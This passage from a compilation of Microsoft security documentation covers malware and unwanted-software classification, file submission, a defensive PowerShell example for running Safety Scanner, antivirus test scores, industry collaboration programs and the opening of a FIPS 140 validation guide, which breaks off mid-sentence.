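# 2. Scan whatever removable media is attached right now.
Invoke-RemovableDriveCheck | Format-Table -AutoSize
```

Disabling AutoRun removes the automatic execution path but not the social one: a drive that shows a single tempting shortcut and hides the real folders still depends on the user double-clicking it, which is what the employee education recommendation in the other sections of this article addresses.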
How Microsoft identifies malware and potentially unwanted applications

Microsoft aims to provide customers with the most delightful and productive Windows experience possible. To
help achieve that, we try our best to ensure our customers are safe and in control of their devices.
Microsoft gives you the information and tools you need when downloading, installing, and running software, as
well as tools that protect you when we know that something unsafe is happening. Microsoft does this by
identifying and analyzing software and online content against criteria described in this article.
You can participate in this process by submitting software for analysis. Our analysts and intelligent systems can
then help identify undesirable software and ensure they are covered by our security solutions.
Because new forms of malware and potentially unwanted applications are being developed and distributed rapidly,
Microsoft reserves the right to adjust, expand, and update these criteria without prior notice or announcements.

Malware
Malware is the overarching name for applications and other code, i.e. software, that Microsoft classifies more
granularly as malicious software or unwanted software.
Malicious software
Malicious software is an application or code that compromises user security. Malicious software might steal your
personal information, lock your PC until you pay a ransom, use your PC to send spam, or download other
malicious software. In general, malicious software tricks, cheats, or defrauds users, places users in vulnerable
states, or performs other malicious activities.
Microsoft classifies most malicious software into one of the following categories:
Backdoor: A type of malware that gives malicious hackers remote access to and control of your PC.
Downloader: A type of malware that downloads other malware onto your PC. It needs to connect to the
internet to download files.
Dropper: A type of malware that installs other malware files onto your PC. Unlike a downloader, a dropper
doesn’t need to connect to the internet to drop malicious files. The dropped files are typically embedded in
the dropper itself.
Exploit: A piece of code that uses software vulnerabilities to gain access to your PC and perform other
tasks, such as installing malware. See more information about exploits.
Hacktool: A type of tool that can be used to gain unauthorized access to your PC.
Macro virus: A type of malware that spreads through infected documents, such as Microsoft Word or Excel
documents. The virus is run when you open an infected document.
Obfuscator: A type of malware that hides its code and purpose, making it more difficult for security
software to detect or remove.
Password stealer: A type of malware that gathers your personal information, such as user names and
passwords. It often works along with a keylogger, which collects and sends information about the keys you
press and websites you visit.
Ransomware: A type of malware that encrypts your files or makes other modifications that can prevent
you from using your PC. It then displays a ransom note stating you must pay money, complete surveys, or
perform other actions before you can use your PC again. See more information about ransomware.
Rogue security software: Malware that pretends to be security software but doesn't provide any
protection. This type of malware usually displays alerts about nonexistent threats on your PC. It also tries to
convince you to pay for its services.
Trojan: A type of malware that attempts to appear harmless. Unlike a virus or a worm, a trojan doesn't
spread by itself. Instead it tries to look legitimate, tricking users into downloading and installing it. Once
installed, trojans perform a variety of malicious activities, such as stealing personal information,
downloading other malware, or giving attackers access to your PC.
Trojan clicker: A type of trojan that automatically clicks buttons or similar controls on websites or
applications. Attackers can use this trojan to click on online advertisements. These clicks can skew online
polls or other tracking systems and can even install applications on your PC.
Worm: A type of malware that spreads to other PCs. Worms can spread through email, instant messaging,
file sharing platforms, social networks, network shares, and removable drives. Sophisticated worms take
advantage of software vulnerabilities to propagate.
Unwanted software
Microsoft believes that you should have control over your Windows experience. Software running on Windows
should keep you in control of your PC through informed choices and accessible controls. Microsoft identifies
software behaviors that ensure you stay in control. We classify software that does not fully demonstrate these
behaviors as "unwanted software".
Lack of choice
You must be notified about what is happening on your PC, including what software does and whether it is active.
Software that exhibits lack of choice might:
Fail to provide prominent notice about the behavior of the software and its purpose and intent.
Fail to clearly indicate when the software is active and might also attempt to hide or disguise its presence.
Install, reinstall, or remove software without your permission, interaction, or consent.
Install other software without a clear indication of its relationship to the primary software.
Circumvent user consent dialogs from the browser or operating system.
Falsely claim to be software from Microsoft.
Software must not mislead or coerce you into making decisions about your PC. This is considered behavior that
limits your choices. In addition to the previous list, software that exhibits lack of choice might:
Display exaggerated claims about your PC’s health.
Make misleading or inaccurate claims about files, registry entries, or other items on your PC.
Display claims in an alarming manner about your PC's health and require payment or certain actions in
exchange for fixing the purported issues.
Software that stores or transmits your activities or data must:
Give you notice and get consent to do so. Software should not include an option that configures it to hide
activities associated with storing or transmitting your data.
Lack of control
You must be able to control software on your computer. You must be able to start, stop, or otherwise revoke
authorization to software.
Software that exhibits lack of control might:
Prevent or limit you from viewing or modifying browser features or settings.
Open browser windows without authorization.
Redirect web traffic without giving notice and getting consent.
Modify or manipulate webpage content without your consent.
Software that changes your browsing experience must only use the browser's supported extensibility model for
installation, execution, disabling, or removal. Browsers that do not provide supported extensibility models will be
considered non-extensible and should not be modified.
Installation and removal
You must be able to start, stop, or otherwise revoke authorization given to software. Software should obtain your
consent before installing, and it must provide a clear and straightforward way for you to install, uninstall, or
disable it.
Software that delivers poor installation experience might bundle or download other "unwanted software" as
classified by Microsoft.
Software that delivers poor removal experience might:
Present confusing or misleading prompts or pop-ups while being uninstalled.
Fail to use standard install/uninstall features, such as Add/Remove Programs.
Advertising and advertisements
Software that promotes a product or service outside of the software itself can interfere with your computing
experience. You should have clear choice and control when installing software that presents advertisements.
The advertisements that are presented by software must:
Include an obvious way for users to close the advertisement. The act of closing the advertisement must not
open another advertisement.
Include the name of the software that presented the advertisement.
The software that presents these advertisements must:
Provide a standard uninstall method for the software using the same name as shown in the advertisement it
presents.
Advertisements shown to you must:
Be distinguishable from website content.
Not mislead, deceive, or confuse.
Not contain malicious code.
Not invoke a file download.
Consumer opinion
Microsoft maintains a worldwide network of analysts and intelligence systems where you can submit software for
analysis. Your participation helps us identify new malware quickly. After analysis, Microsoft creates security
intelligence for software that meets the described criteria. This security intelligence identifies the software as
malware and is available to all users through Windows Defender Antivirus and other Microsoft antimalware
solutions.
Potentially unwanted application (PUA)
Our PUA protection aims to safeguard user productivity and ensure enjoyable Windows experiences. This optional
protection, available to enterprises, helps deliver more productive, performant, and delightful Windows
experiences.
PUAs are not considered malware.
Microsoft uses specific categories and the category definitions to classify software as a PUA.
Advertising software: Software that displays advertisements or promotions, or prompts the user to
complete surveys for other products or services in software other than itself. This includes software that
inserts advertisements to webpages.
Torrent software: Software that is used to create or download torrents or other files specifically used with
peer-to-peer file-sharing technologies.
Cryptomining software: Software that uses your computer resources to mine cryptocurrencies.
Bundling software: Software that offers to install other software that is not digitally signed by the same
entity. Also, software that offers to install other software that qualify as PUA based on the criteria outlined in
this document.
Marketing software: Software that monitors and transmits the activities of the user to applications or
services other than itself for marketing research.
Evasion software: Software that actively tries to evade detection by security products, including software
that behaves differently in the presence of security products.
Poor industry reputation: Software that trusted security providers detect with their security products. The
security industry is dedicated to protecting customers and improving their experiences. Microsoft and other
organizations in the security industry continuously exchange knowledge about files we have analyzed to
provide users with the best possible protection.
Submit files for analysis

If you have a file that you suspect might be malware or is being incorrectly detected, you can submit it to us for
analysis. This page has answers to some common questions about submitting a file for analysis.

How do I send a malware file to Microsoft?


You can send us files that you think might be malware or files that have been incorrectly detected through the
sample submission portal.
We receive a large number of samples from many sources. Our analysis is prioritized by the number of file
detections and the type of submission. You can help us complete a quick analysis by providing detailed information
about the product you were using and what you were doing when you found the file.
If you sign in before you submit a sample, you will be able to track your submissions.

Can I send a sample by email?


No, we only accept submissions through our sample submission portal.

Can I submit a sample without signing in?


Yes, you may submit a file as an anonymous home customer. You will get a link to a webpage where you can view
the status of the submission.
If you're an enterprise customer, you need to sign in so that we can prioritize your submission appropriately. If you
are currently experiencing a virus outbreak or security-related incident, you should contact your designated
Microsoft support professional or go to Microsoft Support for immediate assistance.

What is the Software Assurance ID (SAID)?


The Software Assurance ID (SAID) is for enterprise customers to track support entitlements. The submission
portal accepts and retains SAID information and allows customers with valid SAIDs to make higher priority
submissions.
How do I dispute the detection of my program?
Submit the file in question as a software developer. Wait until your submission has a final determination.
If you’re not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.

How do I track or view past sample submissions?


You can track your submissions through the submission history page. Your submission will only appear on this
page if you were signed in when you submitted it.
If you’re not signed in when you submit a sample, you will be redirected to a tracking page. Bookmark this page if
you want to come back and check on the status of your submission.
What does the submission status mean?
Each submission is shown to be in one of the following status types:
Submitted—the file has been received
In progress—an analyst has started checking the file
Closed—a final determination has been given by an analyst
If you are signed in, you can see the status of any files you submit to us on the submission history page.

How does Microsoft prioritize submissions?


Processing submissions takes dedicated analyst resources. Because we regularly receive a large number of
submissions, we handle them based on priority. The following factors affect how we prioritize submissions:
Prevalent files with the potential to impact large numbers of computers are prioritized.
Authenticated customers, especially enterprise customers with valid Software Assurance IDs (SAIDs), are
given priority.
Submissions flagged as high priority by SAID holders are given immediate attention.
Your submission is immediately scanned by our systems to give you the latest determination even before an
analyst starts handling your case. Note that the same file may have already been processed by an analyst. To check
for updates to the determination, select rescan on the submission details page.
Microsoft Safety Scanner

Microsoft Safety Scanner is a scan tool designed to find and remove malware from Windows computers. Simply
download it and run a scan to find malware and try to reverse changes made by identified threats.
Download Microsoft Safety Scanner (32-bit)
Download Microsoft Safety Scanner (64-bit)
Safety Scanner only scans when manually triggered and is available for use 10 days after being downloaded. We
recommend that you always download the latest version of this tool before each scan.

NOTE: This tool does not replace your antimalware product. For real-time protection with automatic updates,
use Windows Defender Antivirus on Windows 10 and Windows 8 or Microsoft Security Essentials on
Windows 7. These antimalware products also provide powerful malware removal capabilities. If you are
having difficulties removing malware with these products, you can refer to our help on removing difficult
threats.
NOTE: Safety scanner is a portable executable and does not appear in the Windows Start menu or as an icon
on the desktop. Note where you saved this download.

System requirements
Safety Scanner helps remove malicious software from computers running Windows 10, Windows 10 Tech
Preview, Windows 8.1, Windows 8, Windows 7, Windows Server 2016, Windows Server Tech Preview, Windows
Server 2012 R2, Windows Server 2012, Windows Server 2008 R2, or Windows Server 2008. Please refer to the
Microsoft Lifecycle Policy.

How to run a scan


1. Download this tool and open it.
2. Select the type of scan you want run and start the scan.
3. Review the scan results displayed on screen. For detailed detection results, view the log at
%SYSTEMROOT%\debug\msert.log.
To remove this tool, delete the executable file (msert.exe by default).
For more information about the Safety Scanner, see the support article on how to troubleshoot problems using
Safety Scanner.
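The three steps above as a single Windows PowerShell session. This is an added example, not part of the original page and not a Microsoft-supplied script. It assumes the 64-bit download was saved as C:\Tools\MSERT.exe, and the /Q (quiet) and /N (detect only) command-line switches are taken from the Safety Scanner troubleshooting article rather than from this page, so confirm them there before relying on them. The Authenticode check is the one thing worth adding to the steps: a freshly downloaded "scanner" that is unsigned, or signed by anyone other than Microsoft, should not be run at all.

```powershell
# Added example (not from the page): age check, signature check, scan, and log
# review for Microsoft Safety Scanner. The path and the /Q and /N switches are
# assumptions; see the lead-in.
$Msert = 'C:\Tools\MSERT.exe'
$Log   = Join-Path $env:SystemRoot 'debug\msert.log'

# 1. The tool expires 10 days after download; refuse to run a stale copy.
#    LastWriteTime is the time the browser wrote the file, i.e. the download time.
$age = (Get-Date) - (Get-Item -LiteralPath $Msert).LastWriteTime
if ($age.TotalDays -gt 10) {
    throw "MSERT.exe is $([int]$age.TotalDays) days old; download a fresh copy before scanning."
}

# 2. Only run a binary with a valid Authenticode signature from Microsoft.
$sig = Get-AuthenticodeSignature -FilePath $Msert
if ($sig.Status -ne 'Valid' -or $sig.SignerCertificate.Subject -notlike '*O=Microsoft Corporation*') {
    throw "Refusing to run $($Msert): signature status '$($sig.Status)', signer '$($sig.SignerCertificate.Subject)'."
}

# 3. Run a detect-only scan with no UI, from an elevated prompt. Drop /N to let
#    the tool attempt removal of what it finds.
$proc = Start-Process -FilePath $Msert -ArgumentList '/Q', '/N' -Wait -PassThru
Write-Host "msert.exe exited with code $($proc.ExitCode)"

# 4. The on-screen summary is brief; the detailed detection results are in msert.log.
if (Test-Path -LiteralPath $Log) {
    Get-Content -LiteralPath $Log -Tail 40
} else {
    Write-Warning "No log found at $Log"
}

# Cleanup is just deleting the executable; it installs nothing.
# Remove-Item -LiteralPath $Msert
```

Because the tool does not update itself, keeping the age check in front of every run is what turns the page's "always download the latest version" advice into something that cannot be forgotten.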

Related resources
Troubleshooting Safety Scanner
Windows Defender Antivirus
Microsoft Security Essentials
Removing difficult threats
Submit file for malware analysis
Microsoft antimalware and threat protection solutions
Top scoring in industry tests
4/8/2019 • 5 minutes to read

Windows Defender Advanced Threat Protection (Windows Defender ATP) technologies consistently achieve high
scores in independent tests, demonstrating the strength of their enterprise threat protection capabilities. Microsoft
aims to be transparent about these test scores. This page summarizes the results and provides analysis.

Endpoint detection & response


Windows Defender ATP endpoint detection and response capabilities provide advanced attack detections that are
near real-time and actionable. Security analysts can prioritize alerts effectively, gain visibility into the full scope of a
breach, and take response actions to remediate threats.
MITRE: Industry-leading optics and detection capabilities
MITRE tested the ability of products to detect techniques commonly used by the targeted attack group APT3 (also
known as Boron or UPS). To isolate detection capabilities, all protection and prevention features were turned off.
Microsoft is happy to be one of the first EDR vendors to sign up for the MITRE evaluation based on the ATT&CK
framework, widely regarded today as the most comprehensive catalog of attacker techniques and tactics.
ATT&CK-based evaluation: Leading optics and detection capabilities | Analysis
Windows Defender ATP delivered comprehensive coverage of attacker techniques across the entire attack
chain. Highlights included the breadth of telemetry, the strength of threat intelligence, and the advanced,
automatic detection through machine learning, heuristics, and behavior monitoring.

Next generation protection


Windows Defender Antivirus consistently performs highly in independent tests, showing that it is a top choice in
the antivirus market. Note that these tests only provide results for antivirus and do not test for additional security
protections.
Windows Defender Antivirus is part of the next generation Windows Defender ATP security stack, which addresses
the latest and most sophisticated threats today. In some cases, customers might not even know they were protected
because a cyberattack is stopped milliseconds after a campaign starts. That's because Windows Defender Antivirus
detects and stops malware at first sight by using machine learning, artificial intelligence, behavioral analysis, and
other advanced technologies.
AV-TEST: Protection score of 6.0/6.0 in the latest test
The AV-TEST Product Review and Certification Report tests on three categories: protection, performance, and
usability. The scores listed below are for the Protection category, which has two scores: Real-World Testing and the
AV-TEST reference set (known as "Prevalent Malware").
January - February 2019 AV-TEST Business User test: Protection score 6.0/6.0 Latest
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 19,956 malware samples
used. This is the fifth consecutive cycle that Windows Defender Antivirus achieved a perfect score.
November - December 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 19,956
malware samples.
September - October 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, protecting against 21,566 of
21,568 tested malware samples.
July - August 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 20,022
malware samples.
May - June 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, detecting 100% of 5,790
malware samples.
March - April 2018 AV-TEST Business User test: Protection score 5.5/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 5.5/6.0, missing 2 out of 5,680
malware samples (0.035% miss rate).
January - February 2018 AV-TEST Business User test: Protection score 6.0/6.0 | Analysis
Windows Defender Antivirus achieved an overall Protection score of 6.0/6.0, with 5,105 malware samples
tested.

AV-Comparatives: Protection rating of 99.6% in the latest test


AV-Comparatives is an independent organization offering systematic testing for security software such as PC/Mac-based
antivirus products and mobile security solutions.
Real-World Protection Test Enterprise August - November 2018: Protection Rate 99.6% Latest
This test, as defined by AV-Comparatives, attempts to assess the effectiveness of each security program to
protect a computer against active malware threats while online. The test set contained 1,207 test cases (such
as malicious URLs).
Malware Protection Test Enterprise August 2018: Protection Rate 99.9%
This test, as defined by AV-Comparatives, attempts to assess a security program's ability to protect a
system against infection by malicious files before, during or after execution. The results are based on testing
against 1,556 malware samples.
Real-World Protection Test Enterprise March - June 2018: Protection Rate 98.7%
The test set contained 1,163 test cases (such as malicious URLs).
Malware Protection Test Enterprise March 2018: Protection Rate 99.9%
For this test, 1,470 recent malware samples were used.
Historical AV-Comparatives Microsoft tests
SE Labs: Total accuracy rating of AAA in the latest test
SE Labs tests a range of solutions used by products and services to detect and/or protect against attacks, including
endpoint software, network appliances, and cloud services.
Enterprise Endpoint Protection October - December 2018: AAA award
Microsoft's next-gen protection was named as one of the leading products, stopping all of the public and
targeted attacks.
Enterprise Endpoint Protection July - September 2018: AAA award
Microsoft's next-gen protection was named as one of the most effective products, stopping all public and
targeted attacks. It showcased its ability to block malicious URLs, deal with exploits, and classify legitimate
apps and websites correctly.
Enterprise Endpoint Protection April - June 2018: AAA award
Microsoft's next-gen protection was named as one of the most effective products, stopping all targeted
attacks and the vast majority of public threats.

To what extent are tests representative of protection in the real world?


It is important to remember that Microsoft sees a much broader set of threats than what is tested in the
evaluations highlighted above. For example, in an average month, we identify over 100 million new threats. Even if
an independent tester could acquire and test 1% of those threats, that would be a million tests across 20 or 30 products. In
other words, the vastness of the malware landscape makes it extremely difficult to evaluate the quality of protection
against real world threats.
The capabilities within Windows Defender ATP provide additional layers of protection that are not factored into
industry tests, and address some of the latest and most sophisticated threats. Isolating AV from the rest of
Windows Defender ATP creates a partial picture of how our security stack operates in the real world. For example,
attack surface reduction and endpoint detection & response capabilities can help prevent malware from getting
onto devices in the first place. We have proven that Windows Defender ATP components catch samples that
Windows Defender Antivirus missed in these industry tests, which is more representative of how effectively our
security suite protects customers in the real world.
Using independent tests, customers can view one aspect of their security suite but can't assess the complete
protection of all the security features. Microsoft is highly engaged in working with several independent testers to
evolve security testing to focus on the end-to-end security stack. In the meantime, customers can evaluate
Windows Defender Advanced Threat Protection in their own networks by signing up for a 90-day trial of Windows
Defender ATP, or enabling Preview features on existing tenants.
Industry collaboration programs
4/5/2019 • 2 minutes to read

Microsoft has several industry-wide collaboration programs with different objectives and requirements. Enrolling
in the right program can help you protect your customers, gain more insight into the current threat landscape, or
assist in disrupting the malware ecosystem.

Virus Information Alliance (VIA)


The VIA program gives members access to information that will help improve protection for Microsoft customers.
Malware telemetry and samples can be provided to security teams to help identify gaps in their protection,
prioritize new threat coverage, or better respond to threats.
You must be a member of VIA if you want to apply for membership to the other programs.
Go to the VIA program page for more information.

Microsoft Virus Initiative (MVI)


MVI is open to organizations that build and own a Real Time Protection (RTP) antimalware product of their own
design, or one developed using a third-party antivirus SDK.
Members get access to Microsoft client APIs for the Windows Defender Security Center, IOAV, AMSI, and Cloud
Files, along with health data and other telemetry to help their customers stay protected. Antimalware products are
submitted to Microsoft for performance testing on a regular basis.
Go to the MVI program page for more information.

Coordinated Malware Eradication (CME)


CME is open to organizations that are involved in cybersecurity and antimalware or that are interested in fighting
cybercrime.
The program aims to bring organizations in cybersecurity and other industries together to pool tools, information
and actions to drive coordinated campaigns against malware. The ultimate goal is to create efficient and long-
lasting results for better protection of our collective communities, customers, and businesses.
Go to the CME program page for more information.
Virus Information Alliance
4/8/2019 • 2 minutes to read

The Virus Information Alliance (VIA) is a public antimalware collaboration program for security software
providers, security service providers, antimalware testing organizations, and other organizations involved in
fighting cybercrime.
Members of the VIA program collaborate by exchanging technical information on malicious software with
Microsoft, with the goal of improving protection for Microsoft customers.

Better protection for customers against malware


The VIA program gives members access to information that will help improve protection for Microsoft customers.
For example, the program provides malware telemetry and samples to security product teams to identify gaps in
their protection and prioritize new threat coverage.
Malware prevalence data is provided to antimalware testers to assist them in selecting sample sets and setting
scoring criteria that represent the real-world threat landscape. Service organizations, such as a CERT, can leverage
our data to help assess the impact of policy changes or to help shut down malicious activity.
Microsoft is committed to continuous improvement to help reduce the impact of malware on customers. By
sharing malware-related information, Microsoft enables members of this community to work towards better
protection for customers.

Becoming a member of VIA


Microsoft has well-defined, objective, measurable, and tailored membership criteria for prospective members of
the Virus Information Alliance (VIA). The criteria are designed to ensure that Microsoft is able to work with security
software providers, security service providers, antimalware testing organizations, and other organizations involved
in the fight against cybercrime to protect a broad range of customers.
Members will receive information to facilitate effective malware detection, deterrence, and eradication. This
includes technical information on malware as well as metadata on malicious activity. Information shared through
VIA is governed by the VIA membership agreement and a Microsoft non-disclosure agreement, where applicable.
VIA has an open enrollment for potential members.
Initial selection criteria
To be eligible for VIA your organization must:
1. Be willing to sign a non-disclosure agreement with Microsoft.
2. Fit into one of the following categories:
Your organization develops antimalware technology that can run on Windows and your organization’s
product is commercially available.
Your organization provides security services to Microsoft customers or for Microsoft products.
Your organization publishes antimalware testing reports on a regular basis.
Your organization has a research or response team dedicated to fighting malware to protect your
organization, your customers, or the general public.
3. Be willing to sign and adhere to the VIA membership agreement.
If your organization meets these criteria and is interested in joining, apply for membership now. If you have
questions, contact us for more information.
Microsoft Virus Initiative
4/8/2019 • 2 minutes to read

The Microsoft Virus Initiative (MVI) helps organizations to get their products working and integrated with
Windows.
MVI members will receive access to Windows APIs (such as those used by Windows Defender Antivirus), and
other technologies including IOAV, AMSI and Cloud Files, malware telemetry and samples, and invitations to
security related events and conferences.
MVI requires members to develop and own antimalware technology and to be present in the antimalware industry
community.

Join MVI
A request for membership is made by an individual as a representative of an organization that develops and
produces antimalware or antivirus technology.
Initial selection criteria
Your organization must meet the following eligibility requirements to qualify for the MVI program:
1. Offer an antimalware or antivirus product that is one of the following:
Your organization's own creation.
Developed by using an SDK (engine and other components) from another MVI Partner company and
your organization adds a custom UI and/or other functionality.
2. Have your own malware research team unless you build a product based on an SDK.
3. Be active and have a positive reputation in the antimalware industry. Your organization is:
Certified through independent testing by an industry standard organization such as ICSA Labs, West
Coast Labs, PCSL IT Consulting Institute, or SKD Labs.
Active in the antimalware industry. For example, it participates in industry conferences or is reviewed in an
industry standard report such as AV-Comparatives, OPSWAT or Gartner.
4. Be willing to sign a non-disclosure agreement (NDA) with Microsoft.
5. Be willing to sign a program license agreement.
6. Be willing to adhere to program requirements for antimalware apps. These requirements define the
behavior of antimalware apps necessary to ensure proper interaction with Windows.
7. Submit your app to Microsoft for periodic performance testing.
Apply now
If your organization meets these criteria and is interested in joining, apply for membership now. If you have
questions, contact us for more information.
Coordinated Malware Eradication
4/5/2019 • 2 minutes to read

Coordinated Malware Eradication (CME) aims to bring organizations in cybersecurity and in other industries
together to change the game against malware. While the cybersecurity industry today is effective at disrupting
malware families through individual efforts, those disruptions rarely lead to eradication, since malware authors
quickly adapt their tactics to survive.
CME calls for organizations to pool their tools, information and actions to drive coordinated campaigns against
malware. The ultimate goal is to drive efficient and long lasting results for better protection of our collective
communities, customers, and businesses.

Combining our tools, information, and actions


Diversity of participation across industries and disciplines, extending beyond cybersecurity, makes eradication
campaigns even stronger across the malware lifecycle. For instance, while security vendors, computer emergency
response/readiness teams (CERTs), and Internet service providers (ISPs) can contribute with malware telemetry,
online businesses can identify fraudulent behavior and law enforcement agencies can drive legal action.
In addition to telemetry and analysis data, Microsoft is planning to contribute cloud-based scalable storage and
computing horsepower with the necessary big data analysis tools built-in to these campaigns.

Coordinated campaigns for lasting results


Organizations participating in the CME effort work together to help eradicate selected malware families by
contributing their own telemetry data, expertise, tools, and other resources. These organizations operate under a
campaign umbrella with clearly defined end goals and metrics. Any organization or member can initiate a
campaign and invite others to join it. The members then have the option to accept or decline the invitations they
receive.

Join the effort


Any organization that is involved in cybersecurity and antimalware or interested in fighting cybercrime can
participate in CME campaigns by enrolling in the Virus Information Alliance (VIA) program. It ensures that
everyone agrees to use the information and tools available for campaigns for their intended purpose (that is, the
eradication of malware).
If your organization meets these criteria and is interested in joining, apply for membership now. If you have
questions, contact us for more information.
Information for developers
4/5/2019 • 2 minutes to read

Learn about the common questions we receive from software developers and get other developer resources such
as detection criteria and file submissions.

In this section
Software developer FAQ – Provides answers to common questions we receive from software developers.
Developer resources – Provides information about how to submit files, detection criteria, and how to check your
software against the latest Security intelligence and cloud protection from Microsoft.
Software developer FAQ
4/5/2019 • 2 minutes to read

This page provides answers to common questions we receive from software developers. For general guidance
about submitting malware or incorrectly detected files, read the submission guide.

Does Microsoft accept files for a known list or false-positive prevention program?
No. We do not accept these requests from software developers. Signing your program's files in a consistent
manner, with a digital certificate issued by a trusted root authority, helps our research team quickly identify the
source of a program and apply previously gained knowledge. In some cases, this might result in your program
being quickly added to the known list or, far less frequently, in adding your digital certificate to a list of trusted
publishers.

How do I dispute the detection of my program?


Submit the file in question as a software developer. Wait until your submission has a final determination.
If you're not satisfied with our determination of the submission, use the developer contact form provided with the
submission results to reach Microsoft. We will use the information you provide to investigate further if necessary.
We encourage all software vendors and developers to read about how Microsoft identifies malware and unwanted
software.

Why is Microsoft asking for a copy of my program?


This can help us with our analysis. Participants of the Microsoft Active Protection Service (MAPS) may
occasionally receive these requests. The requests will stop once our systems have received and processed the file.

Why does Microsoft classify my installer as a software bundler?


It contains instructions to offer a program classified as unwanted software. You can review the criteria we use to
check applications for behaviors that are considered unwanted.

Why is the Windows Firewall blocking my program?


This is not related to Windows Defender Antivirus and other Microsoft antimalware. You can find out more about
Windows Firewall from the Microsoft Developer Network.

Why does Windows Defender SmartScreen say my program is not commonly downloaded?
This is not related to Windows Defender Antivirus and other Microsoft antimalware. You can find out more from
the SmartScreen website.
Software developer resources
4/5/2019 • 2 minutes to read

Concerned about the detection of your software? If you believe that your application or program has been
incorrectly detected by Microsoft security software, submit the relevant files for analysis.
Check out the following resources for information on how to submit and view submissions:
Submit files
View your submissions

Additional resources
Detection criteria
To objectively identify malware and unidentified software, Microsoft applies a set of criteria for evaluating
malicious or potentially harmful code.
Developer questions
Find more guidance about the file submission and detection dispute process in our FAQ for software developers.
Scan your software
Use Windows Defender Antivirus to check your software against the latest Security intelligence and cloud
protection from Microsoft.
FIPS 140 Validation
4/5/2019 • 166 minutes to read

On this page
Introduction
FIPS 140 Overview
Microsoft Product Validation (Information for Procurement Officers and Auditors)
Information for System Integrators
Information for Software Developers
FIPS 140 FAQ
Microsoft FIPS 140 Validated Cryptographic Modules
Cryptographic Algorithms
Updated: March 2018

Introduction
This document provides information on how Microsoft products and cryptographic modules comply with the U.S.
Federal government standard, Federal Information Processing Standard (FIPS) 140 – Security Requirements for
Cryptographic Modules [FIPS 140].
Audience
This document is primarily focused on providing information for three parties:
Procurement Officer – Responsible for verifying that Microsoft products (or even third-party applications) are
either FIPS 140 validated or utilize a Microsoft FIPS 140 validated cryptographic module.
System Integrator – Responsible for ensuring that Microsoft Products are configured properly to use only FIPS
140 validated cryptographic modules.
Software Developer – Responsible for building software products that utilize Microsoft FIPS 140 validated
cryptographic modules.
Document Map
This document is broken into seven major sections:
FIPS 140 Overview – Provides an overview of the FIPS 140 standard as well as provides some historical
information about the standard.
Microsoft Product Validation (Information for Procurement Officers and Auditors) – Provides information on how
Microsoft products are FIPS 140 validated.
Information for System Integrators – Describes how to configure and verify that Microsoft Products are being used
in a manner consistent with the product’s FIPS 140 Security Policy.
Information for Software Developers – Identifies how developers can leverage the Microsoft FIPS 140 validated
cryptographic modules.
FAQ – Frequently Asked Questions.
Microsoft FIPS 140 Validated Cryptographic Modules – Explains Microsoft cryptographic architecture and
identifies specific modules that are FIPS 140 validated.
Cryptographic Algorithms – Lists the cryptographic algorithm, modes, states, key sizes, Windows versions, and
corresponding cryptographic algorithm validation certificates.

FIPS 140 Overview


FIPS 140 Standard
FIPS 140 is a US government and Canadian government standard that defines a minimum set of security
requirements for products that implement cryptography. This standard is designed for cryptographic modules that
are used to secure sensitive but unclassified information. Testing against the FIPS 140 standard is maintained by
the Cryptographic Module Validation Program (CMVP), a joint effort between the US National Institute of
Standards and Technology (NIST) and the Communications Security Establishment of Canada (CSEC).
The current standard defines four levels of increasing security, 1 through 4. Most software products (including all
Microsoft products) are tested against the Level 1 security requirements.
Applicability of the FIPS standard
Within the US Federal government, the FIPS 140 standard applies to any security system (whether hardware,
firmware, software, or a combination thereof) to be used by agencies for protecting sensitive but unclassified
information. Some agencies have expanded its use by requiring that the modules to be procured for secret systems
also meet the FIPS 140 requirements.
The FIPS 140 standard has also been used by different standards bodies, specification groups, nations, and private
institutions as a requirement or guideline for those products (e.g. – Digital Cinema Systems Specification).
History of 140-1
FIPS 140-1 is the original working version of the standard made official on January 11, 1994. The standard
remained in effect until FIPS 140-2 became mandatory for new products on May 25, 2002.
FIPS 140-2
FIPS 140-2 is currently the active version of the standard.
Microsoft FIPS Support Policy
Microsoft actively maintains FIPS 140 validation for its cryptographic modules.
FIPS Mode of Operation
The common term “FIPS mode” is used in this document and Security Policy documents. When a cryptographic
module contains both FIPS-approved and non-FIPS-approved security methods, it must have a "FIPS mode of
operation" to ensure only FIPS-approved security methods may be used. When a module is in "FIPS mode", a
non-FIPS-approved method cannot be used instead of a FIPS-approved method.

Microsoft Product Validation (Information for Procurement Officers and Auditors)


This section provides information for Procurement Officers and Auditors who are responsible for ensuring that
Microsoft products with FIPS 140 validated cryptographic modules are used in their organization. The goal of this
section is to provide an overview of the Microsoft developed products and modules and explain how the validated
cryptographic modules are used.
Microsoft Product Relationship with CNG and CAPI libraries
Rather than validate individual components and products, Microsoft chooses to validate only the underlying
cryptographic modules. Subsequently, many Windows components and Microsoft products are built to rely on the
Cryptographic API: Next Generation (CNG) and legacy Cryptographic API (CAPI) FIPS 140 validated
cryptographic modules. Windows components and Microsoft products use the documented application
programming interfaces (APIs) for each of the modules to access various cryptographic services.
The following list contains some of the Windows components and Microsoft products that rely on FIPS 140
validated cryptographic modules:
Schannel Security Package
Remote Desktop Protocol (RDP) Client
Encrypting File System (EFS)
Some Microsoft .NET Framework Applications (.NET also provides cryptographic algorithm implementations
that have not been FIPS 140 validated.)
BitLocker® Drive Full-volume Encryption
IPsec Settings of Windows Firewall

Information for System Integrators


This section provides information for System Integrators and Auditors who are responsible for deploying
Microsoft products in a manner consistent with the product’s FIPS 140 Security Policy.
There are two steps to ensure that Microsoft products operate in FIPS mode:
1. Selecting/Installing FIPS 140 validated cryptographic modules
2. Setting FIPS local/group security policy flag.
Step 1 – Selecting/Installing FIPS 140 Validated Cryptographic Modules
Systems Integrators must ensure that all cryptographic modules installed are, in fact, FIPS 140 validated. This can
